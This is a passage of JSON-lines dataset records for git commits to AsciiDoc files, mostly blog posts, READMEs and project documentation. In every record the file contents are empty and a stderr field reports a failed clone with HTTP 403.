pring-security,kazuki43zoo\/spring-security,rwinch\/spring-security,chinazhaoht\/spring-security,thomasdarimont\/spring-security,hippostar\/spring-security,MatthiasWinzeler\/spring-security,ollie314\/spring-security,driftman\/spring-security,Peter32\/spring-security,kazuki43zoo\/spring-security,wilkinsona\/spring-security,eddumelendez\/spring-security,SanjayUser\/SpringSecurityPro,SanjayUser\/SpringSecurityPro,zhaoqin102\/spring-security,izeye\/spring-security,hippostar\/spring-security,panchenko\/spring-security,yinhe402\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,fhanik\/spring-security,likaiwalkman\/spring-security,Peter32\/spring-security,fhanik\/spring-security,mrkingybc\/spring-security,follow99\/spring-security,Krasnyanskiy\/spring-security,tekul\/spring-security,zgscwjm\/spring-security,zgscwjm\/spring-security,mounb\/spring-security,wkorando\/spring-security,diegofernandes\/spring-security,yinhe402\/spring-security,liuguohua\/spring-security,spring-projects\/spring-security,follow99\/spring-security,olezhuravlev\/spring-security,mounb\/spring-security,zshift\/spring-security,djechelon\/spring-security,jmnarloch\/spring-security,Xcorpio\/spring-security,diegofernandes\/spring-security,jmnarloch\/spring-security,thomasdarimont\/spring-security,diegofernandes\/spring-security,mrkingybc\/spring-security,tekul\/spring-security,cyratech\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,mdeinum\/spring-security,xingguang2013\/spring-security,kazuki43zoo\/spring-security,chinazhaoht\/spring-security,driftman\/spring-security,MatthiasWinzeler\/spring-security,hippostar\/spring-security,rwinch\/spring-security,fhanik\/spring-security,olezhuravlev\/spring-security,xingguang2013\/spring-security,izeye\/spring-security,mdeinum\/spring-security,zshift\/spring-security,vitorgv\/spring-security,ractive\/spring-security,eddumelendez\/spring-security,zshift\/spring-security,Xcorpio\/spring-security,mounb\/spring-security,zhaoqin102\/spring-security,driftman\/spring-security,vitorgv\/spring-security,Krasnyanskiy\/spring-security,likaiwalkman\/spring-security,jmnarloch\/spring-security,pwheel\/spring-security,mparaz\/spring-security,eddumelendez\/spring-security,thomasdarimont\/spring-security,zgscwjm\/spring-security,liuguohua\/spring-security,caiwenshu\/spring-security,likaiwalkman\/spring-security,chinazhaoht\/spring-security,vitorgv\/spring-security,hippostar\/spring-security,adairtaosy\/spring-security,Xcorpio\/spring-security,pkdevbox\/spring-security,Peter32\/spring-security,jgrandja\/spring-security,zhaoqin102\/spring-security,fhanik\/spring-security,cyratech\/spring-security","old_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5c393e46d440d45b4a5b89ed490b762293cf47b","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"595d94b9516b057e1c51db55a6b747bbe8018252","subject":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","message":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c583ff5533b32e4e7c198d9fd987628a5c52b28","subject":"Update 2015-08-19-Test-Post.adoc","message":"Update 2015-08-19-Test-Post.adoc","repos":"matthewbadeau\/matthewbadeau.github.io,matthewbadeau\/matthewbadeau.github.io,matthewbadeau\/matthewbadeau.github.io","old_file":"_posts\/2015-08-19-Test-Post.adoc","new_file":"_posts\/2015-08-19-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matthewbadeau\/matthewbadeau.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fad0b655e34cd5f6f05d29b509332f9ae87507b2","subject":"Python - IPython notebook: zooming in a pylab plot","message":"Python - IPython notebook: zooming in a pylab plot\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"bc703f3ccca500e0194c70e83811121b0c35f5cf","subject":"Description","message":"Description\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e3877eba366760133775362c296bd84ac80a806","subject":"Initial README","message":"Initial README\n","repos":"sneakybeaky\/aws-volumes,sneakybeaky\/ebs-volumes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sneakybeaky\/ebs-volumes.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de0a394c00cdc7dd1b7fb9fbd9a4a6882d578d68","subject":"docs: add hide\/unhide contract to JSONRPC","message":"docs: add hide\/unhide contract to JSONRPC\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d5276c230e1d689dcdc5ee18f9fb6e63cd31a8f0","subject":"ASDF quick start","message":"ASDF quick start\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b1f8bb22d6d94fd8565d1bf716fdfc7e2163e685","subject":"Update 2017-02-17-jquery-good-and-more.adoc","message":"Update 2017-02-17-jquery-good-and-more.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-jquery-good-and-more.adoc","new_file":"_posts\/2017-02-17-jquery-good-and-more.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a3550351b8d590a14027d3f5686173436c9b955","subject":"Update 2015-10-30-The-Lost-Days.adoc","message":"Update 2015-10-30-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebdb095ca2e0c3f0d7c042d863f8fd8f0e7e610d","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2c81b7e0e1b9354d8035aaeaa0e0eba10bf2d68","subject":"Update 2016-07-03-Some-Flowers.adoc","message":"Update 2016-07-03-Some-Flowers.adoc","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-03-Some-Flowers.adoc","new_file":"_posts\/2016-07-03-Some-Flowers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6b54b441ab835a545e2829a9b7b0f88a07f7395","subject":"Update 2018-11-01-gohu-netlify.adoc","message":"Update 2018-11-01-gohu-netlify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47f03bfb551f2a73a9db409ff8931bb3afa02e7a","subject":"Update 2015-06-19-Breizhcamp-Saison-5.adoc","message":"Update 2015-06-19-Breizhcamp-Saison-5.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-19-Breizhcamp-Saison-5.adoc","new_file":"_posts\/2015-06-19-Breizhcamp-Saison-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d4a458c5a42067ee28be900e7efed1fd1a00d3f","subject":"Update 2015-09-20-dogs_in_india.adoc","message":"Update 2015-09-20-dogs_in_india.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-20-dogs_in_india.adoc","new_file":"_posts\/2015-09-20-dogs_in_india.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0780588f44ba7cd17da027dc95f8714bebc17a24","subject":"docs update for 0.7.5","message":"docs update for 0.7.5\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db8741779422c3c1ba52d2a0c40aa9596bbd260b","subject":"Update 2015-09-18-Malaysia-Airlines.adoc","message":"Update 2015-09-18-Malaysia-Airlines.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-Malaysia-Airlines.adoc","new_file":"_posts\/2015-09-18-Malaysia-Airlines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b72c4a0b41df4352ed3c84da7f5a1f3e96f1f098","subject":"Deleted 2016-11-10.adoc","message":"Deleted 2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"2016-11-10.adoc","new_file":"2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4014fbed6a4342df9ac8da8db2ef1c194042603e","subject":"Create Binary-Repository-Manager-Feature-Matrix.adoc","message":"Create Binary-Repository-Manager-Feature-Matrix.adoc","repos":"binary-repositories-comparison\/binary-repositories-comparison.github.io,lavcraft\/binary-repositories-comparison.github.io,gAmUssA\/binary-repositories-comparison.github.io,lavcraft\/binary-repositories-comparison.github.io,gAmUssA\/binary-repositories-comparison.github.io","old_file":"Binary-Repository-Manager-Feature-Matrix.adoc","new_file":"Binary-Repository-Manager-Feature-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binary-repositories-comparison\/binary-repositories-comparison.github.io.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"188f707c0a4de7604069d71c9126dd886cf0d276","subject":"Update 2017-10-27-.adoc","message":"Update 2017-10-27-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-.adoc","new_file":"_posts\/2017-10-27-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fbf3d545ed95bcde8d9380cbcb472952c5990a2","subject":"ISIS-1521: reorganizes ugfun.adoc, to get rid of 'how-to' chaptergs","message":"ISIS-1521: reorganizes ugfun.adoc, to get rid of 'how-to' chaptergs\n","repos":"incodehq\/isis,apache\/isis,incodehq\/isis,incodehq\/isis,apache\/isis,apache\/isis,apache\/isis,estatio\/isis,estatio\/isis,estatio\/isis,apache\/isis,incodehq\/isis,oscarbou\/isis,oscarbou\/isis,oscarbou\/isis,oscarbou\/isis,estatio\/isis,apache\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/ugfun\/_ugfun_domain-class-ontology_mixins.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/ugfun\/_ugfun_domain-class-ontology_mixins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oscarbou\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dff4ea04dc0e286e8cb43fea0177d3efc249aec5","subject":"Refer to the tcp_reverse example for full gen_server","message":"Refer to the tcp_reverse example for full gen_server\n","repos":"ninenines\/ranch,K2InformaticsGmbH\/ranch,layerhq\/ranch","old_file":"doc\/src\/guide\/protocols.asciidoc","new_file":"doc\/src\/guide\/protocols.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ninenines\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"65580df92b2a7874c1f672071bdcc069f91e0716","subject":"[Documentation] Added Proxy module","message":"[Documentation] Added Proxy module\n","repos":"os890\/DS_Discuss,os890\/deltaspike-vote,danielsoro\/deltaspike,mlachat\/deltaspike,idontgotit\/deltaspike,os890\/DS_Discuss,idontgotit\/deltaspike,danielsoro\/deltaspike,rdicroce\/deltaspike,struberg\/deltaspike,chkal\/deltaspike,chkal\/deltaspike,rdicroce\/deltaspike,idontgotit\/deltaspike,chkal\/deltaspike,subaochen\/deltaspike,struberg\/deltaspike,chkal\/deltaspike,Danny02\/deltaspike,rdicroce\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,struberg\/deltaspike,idontgotit\/deltaspike,rdicroce\/deltaspike,danielsoro\/deltaspike,apache\/deltaspike,os890\/deltaspike-vote,apache\/deltaspike,apache\/deltaspike,os890\/DS_Discuss,apache\/deltaspike,Danny02\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike,os890\/DS_Discuss,mlachat\/deltaspike,danielsoro\/deltaspike,Danny02\/deltaspike,subaochen\/deltaspike,os890\/deltaspike-vote,mlachat\/deltaspike,Danny02\/deltaspike","old_file":"documentation\/src\/main\/asciidoc\/proxy.adoc","new_file":"documentation\/src\/main\/asciidoc\/proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3f39f18473d3123969f3c5d2f23c6426a3279af3","subject":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","message":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edeab29949d5fafcea8e2a96b46a377c9821e5cf","subject":"Revert \"Update README.asciidoc\"","message":"Revert \"Update README.asciidoc\"\n\nThis reverts commit d89537b24c8936d50ebdffbedf9e4d0ca24014c5.\n","repos":"farleylai\/MonsoonPowerToolWS,farleylai\/MonsoonPowerToolWS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/farleylai\/MonsoonPowerToolWS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66fb6d6691a05b41a67c03b17b5acb0c33eb7ab5","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62904993dd879e8aa6df7ca0084e42318fe37e8c","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f155d0f4961bd559b685d969ea549d738084305b","subject":"Update 2017-04-05-Questo-e-un-test.adoc","message":"Update 2017-04-05-Questo-e-un-test.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-05-Questo-e-un-test.adoc","new_file":"_posts\/2017-04-05-Questo-e-un-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b48287ee2ee2bf7e9fa2a2e6d55876c25758eb","subject":"fixing the link","message":"fixing the link","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"java\/chapters\/appc.adoc","new_file":"java\/chapters\/appc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"42b1c21db83ce939c6a26e7a51a7a9f59aff7e0c","subject":"Renamed '_posts\/2018-08-30-Docker-bro.adoc' to '_posts\/2018-08-30-Docker-cmd.adoc'","message":"Renamed '_posts\/2018-08-30-Docker-bro.adoc' to '_posts\/2018-08-30-Docker-cmd.adoc'","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-08-30-Docker-cmd.adoc","new_file":"_posts\/2018-08-30-Docker-cmd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc5ffca9b3cae0b62d68e8308ad428d7875d23c0","subject":"Maven exercices","message":"Maven exercices\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Maven.adoc","new_file":"Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15cf0844f0ae4c042c95b43d367659eaf3efe3fb","subject":"Added files via upload","message":"Added files via upload","repos":"weslleyrosalem\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,ramrexx\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,ramrexx\/CloudForms_Essentials","old_file":"style_guide.adoc","new_file":"style_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/weslleyrosalem\/CloudForms_Essentials.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"283dc5dd536faddb189599e7e4e302497d8296c3","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a41f932488377df75b1a1b6fb8eb36fad16984a","subject":"Update 2015-06-21-Pixi-mouseover-example.adoc","message":"Update 2015-06-21-Pixi-mouseover-example.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-06-21-Pixi-mouseover-example.adoc","new_file":"_posts\/2015-06-21-Pixi-mouseover-example.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7b8e01464182eb4fc10c3df53f7715edad89e44","subject":"Update 2016-08-24-Elasticsearch-and-YAML.adoc","message":"Update 2016-08-24-Elasticsearch-and-YAML.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2016-08-24-Elasticsearch-and-YAML.adoc","new_file":"_posts\/2016-08-24-Elasticsearch-and-YAML.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8286027ea8aca0f52452b5a71ddc9a81190acc72","subject":"Renamed '_posts\/2017-09-18-Adding-custom-domain-to-hubpress.adoc' to '_posts\/2017-09-22-Custom-domain-hubpress.adoc'","message":"Renamed '_posts\/2017-09-18-Adding-custom-domain-to-hubpress.adoc' to '_posts\/2017-09-22-Custom-domain-hubpress.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-22-Custom-domain-hubpress.adoc","new_file":"_posts\/2017-09-22-Custom-domain-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdaba1993c2e1683d89c2b51bad1baadbd79a226","subject":"update backers badge","message":"update backers badge\n","repos":"dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dizitart\/nitrite-database.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8dc7e9649f25b6edfd016e5d9dd242a397d1934","subject":"Update 2015-04-15-mon-blog.adoc","message":"Update 2015-04-15-mon-blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-mon-blog.adoc","new_file":"_posts\/2015-04-15-mon-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91b7f0282b2ec23a0905fd8c4ecb991d41420ce5","subject":"Update 2016-09-26-Math-Quantifiers.adoc","message":"Update 2016-09-26-Math-Quantifiers.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-26-Math-Quantifiers.adoc","new_file":"_posts\/2016-09-26-Math-Quantifiers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa8463fd84fd2eef21b7ce94ff55052c6ca9c01","subject":"Update 2020-02-06-SSE-SIMD.adoc","message":"Update 2020-02-06-SSE-SIMD.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-06-SSE-SIMD.adoc","new_file":"_posts\/2020-02-06-SSE-SIMD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"514af04783bf64417667958d5426a3a3b4299f26","subject":"Update 2014-03-06-Eclipse-Tips-004-Echapper-les-caracteres-lorsque-lon-colle-dans-un-String.adoc","message":"Update 2014-03-06-Eclipse-Tips-004-Echapper-les-caracteres-lorsque-lon-colle-dans-un-String.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-06-Eclipse-Tips-004-Echapper-les-caracteres-lorsque-lon-colle-dans-un-String.adoc","new_file":"_posts\/2014-03-06-Eclipse-Tips-004-Echapper-les-caracteres-lorsque-lon-colle-dans-un-String.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f31ca44eb3e558eed05d2aa31973ab410b58585","subject":"Add assignment.adoc (copied from the provided pdf)","message":"Add assignment.adoc (copied from the provided pdf)\n","repos":"ciarand\/operating-systems-memory-management-assignment","old_file":"assignment.adoc","new_file":"assignment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciarand\/operating-systems-memory-management-assignment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"505f01e4dd8a0e01eebd50fcfd3e4e25c17947c8","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-ipfiltering","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 